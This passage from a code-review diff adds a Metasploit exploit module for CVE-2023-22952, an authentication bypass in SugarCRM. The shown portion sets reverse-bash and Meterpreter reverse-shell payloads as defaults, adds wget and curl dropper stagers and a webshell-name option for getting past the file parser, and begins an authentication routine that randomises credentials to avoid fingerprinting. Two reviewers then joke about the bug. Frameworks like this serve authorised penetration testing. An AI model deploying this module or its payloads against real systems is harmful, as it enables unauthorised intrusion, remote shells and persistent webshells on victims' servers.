modules/exploits/linux/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -0,0 +1,191 @@
+          under which the web services run (typically user www-data). 
+          SugarCRM 11.0 Professional, Enterprise, Ultimate, Sell and Serve versions 11.0.4 and below are affected. Fixed in release 11.0.5 
+          SugarCRM 12.0 Enterprise, Sell and Serve versions 12.0.1 and below are affected. Fixed in release 12.0.2.
+        },
+        'Author' => [
+          'Sw33t.0day', # discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2023-22952' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2022/Dec/31' ],
+          [ 'URL', 'https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-001/' ],
+          [ 'URL', 'https://sugarclub.sugarcrm.com/engage/b/sugar-news/posts/jan-5-2023-security-vulnerability-update' ],
+          [ 'URL', 'https://attackerkb.com/topics/E486ui94II/cve-2023-22952' ],
+          [ 'PACKETSTORM', '170346' ]
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-12-28',
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('WEBSHELL', [
+          false, 'The name of the webshell with extension to beat the parser like .phtml,.phar,.shtml,.inc, and others. Webshell name will be randomly generated if left unset.', nil
+        ])
+      ]
+    )
+  end
+
+  def authenticate
+    # generate PHP session-id
+    @phpsessid = "PHPSESSID=#{SecureRandom.uuid}"
+
+    # randomize user and password to obfuscate and make finger printing difficult.
+    user_name = Rex::Text.rand_name
+    user_password = Rex::Text.rand_text_alphanumeric(8..16)
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'cookie' => @phpsessid.to_s,
```

Comment:
Is the auth bypass here simply that you send a request with an existing PHP session ID cookie assigned? Might want to comment on this. This is pretty silly of a bug 😄

Reply:
It is indeed pretty silly, but we have seen more silly things out there, right? 😉 
See my [AttackerKB Article](https://attackerkb.com/topics/E486ui94II/cve-2023-22952) that explains this flaw in more detail.